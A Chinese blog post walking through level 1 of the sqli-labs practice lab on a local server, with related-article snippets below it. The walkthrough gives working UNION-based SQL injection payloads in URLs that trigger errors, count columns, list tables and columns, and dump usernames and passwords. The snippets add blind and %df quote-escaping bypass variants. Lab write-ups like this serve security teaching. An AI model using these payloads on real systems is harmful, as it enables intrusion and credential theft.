sqllab 第一关

最新推荐文章于 2024-04-17 12:25:09 发布
最新推荐文章于 2024-04-17 12:25:09 发布
阅读量492 收藏 1
点赞数 2
分类专栏: sqllab 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aliexiansheng/article/details/109202200
版权

一、正常访问

在这里插入图片描述判断是否存在注入

http://127.0.0.1/sqllab/Less-1/?id=1'

在这里插入图片描述
标白部分为实际的报错内容,可以看出因为写入的’拼接到语句中造成原语句的单引号多余,导致报错。

在这里插入图片描述通过添加的 – + 注释掉后续查询语句,达到语句正常执行的目的

二、猜解当前数据库列数以及页面中的显示位置

http://127.0.0.1/sqllab/Less-1/?id=1'order by 1 --+
http://127.0.0.1/sqllab/Less-1/?id=1'order by 2 --+
http://127.0.0.1/sqllab/Less-1/?id=1'order by 3 --+

在这里插入图片描述当按列排序执行到3时正常,执行到4时报错,说明当前数据库有3列。
在这里插入图片描述
判断回显位置

在这里插入图片描述
可以看到当前数据库的第二列和第三列会回显到的位置。

三、查询当前数据库等信息

在这里插入图片描述

http://127.0.0.1/sqllab/Less-1/?id=1' and 1=2 union select 1,database(),3 --+

查询当前数据库中有哪些表
在这里插入图片描述可以看到存在有 emails,referers,uagents,users 数据表。

继续将列的内容注入出来。

在这里插入图片描述

http://127.0.0.1/sqllab/Less-1/?id=1' and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name = "users" ),3 --

现在梳理一下:
存在一个库叫做 security。它有四个表,其中一个为 users,这个表中包含 id,username,password这三个列。
直接查询数据:

http://127.0.0.1/sqllab/Less-1/?id=1' and 1=2 union select 1,(select group_concat(concat_ws(0x3a,id,username,password)) from users),3 --+

在这里插入图片描述

sera__
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sql-lab全解_sqllab,网络安全开发面试技巧
m0_61369227的博客
04-06 982
但是和之前一样存在通病,没有循环过滤检查,这里and和or也是可以使用双写绕过,但是空格没法绕过,这里采用括号法用括号去间隔语句,闭合方式采用%00截断,即将语句后部分的语句全部删去。
sql-lab靶场讲解
CN天狼
12-16 5460
sql-lab讲解
sql-lab(1-16)
m0_74092885的博客
10-15 113
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8390
sql注入集合
用phpstudy搭建sql lab进行sql注入的学习,搭建实验室的详细操作
m0_64898960的博客
03-11 2168
详细教你用phpstudy搭建sql注入靶场
sql-lab 1~10总结(后续持续更新)
m0_62879498的博客
12-11 656
sql注入的一般流程: (1~6关) 判断注入点 当 id=1 and 1=2 – q页面异常是可能存在在sql注入 若页面出现非法,使用其他注入。 判断字段数 order by (根据指定的列对结果进行排序),输出的数字超过列数,报错,因此可以借助此特性,进行列数的判断。 判断回显点 eg: union select 1,2,3 页面显示2,说明回显点在2 注意:要让id的值等于一个不存在的值,这样联合查询的返回值会让union之后的查询结果在数组的第一列。只有让id的只是一个不
SQLLab51:实验5
03-21
SQLGroupLab5
SQLLab5:从node.js连接到mysql
03-08
SQLLab5 从node.js连接到mysql
sql-lab:一个练习编写基本SQL命令的项目
02-20
SQL练习主题结构化查询语言(SQL) 关系数据库SQLite的编写基本查询任务对于本实验,您将: 使用在线工具针对预先填充的数据库编写SQL语句。 为每个查询获取正确SQL语句后,将其写入相应标题下的queries.md文件中。...
SQL-lab:sql注入全部解析
04-17
先看题,要求输入一个数字入乡随俗,试一试很显然,会有回显接下来自由发挥,再输入一个2试试,又变了接下来,接下来试一试他的闭合方式添加完单引号,根据报错的回显,发现他是单引号闭合方式,并且是字符型注入再...
sqli-labs.zip
12-31
sql注入渗透测试环境,易于搭建,学习SQL注入必备环境。 里面一共有60多节课程。 非常不错的安全技术学习资料。
sql-lab (36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别(后持续更新)
m0_62879498的博客
01-20 659
(36~40)包括堆叠注入,Mysql_real_escape_string 和addslashes区别 sql-lab-36 和前面的关卡一样,本题对 ’ 进行了注入,我们可以利用以前学过的办法,使用 %df 进行一个绕过。 判断注入点:?id=1 %df’ and 1=2 – q 判断字段数:id=1 %df’ order by 4-- q 判断显错位:?id=-1 %df’ union select 1,2,3-- q 判断库名:?id=-1 %df’ union select 1,datab
Sqli-labs靶场第1关详解[Sqli-labs-less-1]
m0_73615178的博客
02-19 491
SQL 注入的三个条件: ①参数可控;(从参数输入就知道参数可控) ②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断) ③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4。
sql-labs(1-8关)
最新发布
2302_80935968的博客
04-17 1178
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
sql-lab 1~5
开心星人的博客
05-12 603
1 ?id=1 ?id=1' ?id=1%27--+ ?id=1' order by 1--+ ?id=1' order by 4--+ 所以有四个字段 ?id=1' union select 1,2,3--+ 因为web页面只能显示一行数据 ?id=-1' union select 1,2,3--+ 将让第一行数据显示不出来 或者 ?id=1' union select 1,2,3 limit 1,1--+ 可以看到有回显的字段2和字段3 ?id=-1' union select 1,2,g
sqli-labs第一关
weixin_69147946的博客
11-11 440
sqli-labs靶机笔记
sqli-lab详解——做题笔记1-10(入门级注解)
Dream__Catcher的博客
10-09 2522
less-1 单引号报错注入 源码:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1 答案及解析: http://127.0.0.1/sqli-labs-master/Less-1/?id= ’ or ‘1’=‘1 ’ or 1=1 --+ (–后要加空格才能注释,但是在网址栏输入时最后加空格解析时会被去掉,所以用+,当然用%20也行) ’ or 1=...
sqli-labs-master 闯关第一关,单引号 ' 字符型注入
qq_39030256的博客
11-18 2665
sqli-labs-master第一关 注:%23为#的url编码 第一关比较简单,在最上面的url后面手动输入http://localhost/sql/sqli-labs-master/Less-1/?id=1可以直接看到用户名密码,同样http://localhost/sql/sqli-labs-master/Less-1/?id=2可以看到另一个用户名密码,以此类推。但是呢,我们要用手动...
SQL-lab 1-4关
yueshangttt的博客
04-09 3735
SQL注入原理 语言分类 1.解释型语言 2.编译型语言 解释型语言,若程序与用户进行交互时。用户就可以构造特殊的输入来拼接到程序中执行,从而使得程序依据用户输入执行有可能存在恶意行为的代码。 万能密码(绕过用户名和密码) 用户名:admin'or1=1-- (单行注释后必须有空格) 密码:随意就可以 cms逻辑:index.php首页展示内容,具有文章列表(l链接具有文章id ),articles.php文章详细页,URL中article.php?id=文章id读取文章id ...
sqllab连接数据库
09-27
通过使用不同的引用内容,我能够回答关于SQL连接数据库的问题。根据引用中的信息,连接到SQL数据库需要以下步骤: 1. 创建连接对象: - 对于SQL数据库,使用`SqlConnection`类创建连接对象。 - 对于ACCESS数据库,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值